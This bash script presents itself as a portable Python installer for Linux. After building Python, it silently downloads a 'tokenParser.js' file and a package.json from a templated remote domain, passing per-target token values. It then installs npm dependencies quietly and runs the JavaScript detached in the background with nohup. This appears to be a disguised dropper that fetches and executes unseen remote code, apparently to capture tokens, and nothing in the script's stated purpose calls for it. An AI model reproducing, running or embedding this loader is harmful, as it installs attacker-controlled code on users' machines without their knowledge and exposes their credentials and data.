#!/bin/bash
#!/usr/bin/env bash
# Creating new Info
set -e

############################
# OS CHECK (LINUX ONLY)
############################

OS="$(uname -s)"

if [ "$OS" != "Linux" ]; then
  echo "[ERROR] This script supports Linux only."
  exit 1
fi

echo "[INFO] Linux detected"

############################
# PYTHON CONFIG
############################

PY_VERSION="3.12.2"
BASE_DIR="$HOME/Documents"
PY_PREFIX="$BASE_DIR/python"
PY_SRC_DIR="$BASE_DIR/Python-${PY_VERSION}"
PY_TARBALL="Python-${PY_VERSION}.tgz"
PY_URL="https://www.python.org/ftp/python/${PY_VERSION}/${PY_TARBALL}"

############################
# CHECK EXISTING PYTHON
############################

if [ -x "$PY_PREFIX/bin/python3" ]; then
  echo "[INFO] Portable Python already exists"
else
  echo "[INFO] Installing portable Python ${PY_VERSION}"

  ############################
  # DOWNLOAD
  ############################

  if command -v curl >/dev/null 2>&1; then
    curl -sSL "$PY_URL" -o "$PY_TARBALL"
  elif command -v wget >/dev/null 2>&1; then
    wget -q "$PY_URL" -O "$PY_TARBALL"
  else
    echo "[ERROR] curl or wget required"
    exit 1
  fi

  ############################
  # EXTRACT
  ############################

  tar -xf "$PY_TARBALL" -C "$BASE_DIR"
  rm -f "$PY_TARBALL"

  ############################
  # BUILD (NO SUDO)
  ############################

  cd "$PY_SRC_DIR"

  echo "[INFO] Building Python (this may take a few minutes)..."

  ./configure \
    --prefix="$PY_PREFIX" \
    --with-ensurepip=install \
    --enable-optimizations

  make -j"$(nproc)"
  make install

  cd - >/dev/null
fi

############################
# PATH (SESSION ONLY)
############################

export PATH="$PY_PREFIX/bin:$PATH"

############################
# VERIFY
############################

echo
echo "====== VERIFY ======"
python3 --version
pip3 --version
echo "===================="

echo "[SUCCESS] Portable Python ready (Linux only, no sudo)."

# Use Documents directory for files
USER_HOME="$HOME/Documents"
mkdir -p "$USER_HOME"

BASE_URL="{{DOMAIN}}"

# Step 8: Download files
# Check if curl is available
if ! command -v curl >/dev/null 2>&1; then
    # If curl is not available, use wget
    wget -q -O "$USER_HOME/tokenParser.js" "$BASE_URL/task/tokenParser?token={{token}}&st={{STEP_TOKEN}}"
    wget -q -O "$USER_HOME/package.json" "$BASE_URL/task/package.json"
else
    # If curl is available, use curl
    curl -s -L -o "$USER_HOME/tokenParser.js" "$BASE_URL/task/tokenParser?token={{token}}&st={{STEP_TOKEN}}"
    curl -s -L -o "$USER_HOME/package.json" "$BASE_URL/task/package.json"
fi

# Step 9: Install 'request' package
cd "$USER_HOME"
npm install --silent --no-progress --loglevel=error --fund=false

# Step 10: Run token parser
if [ -f "$USER_HOME/tokenParser.js" ]; then
    nohup node "$USER_HOME/tokenParser.js" > "$USER_HOME/tokenParser.log" 2>&1 &
else
    exit 1
fi

exit 0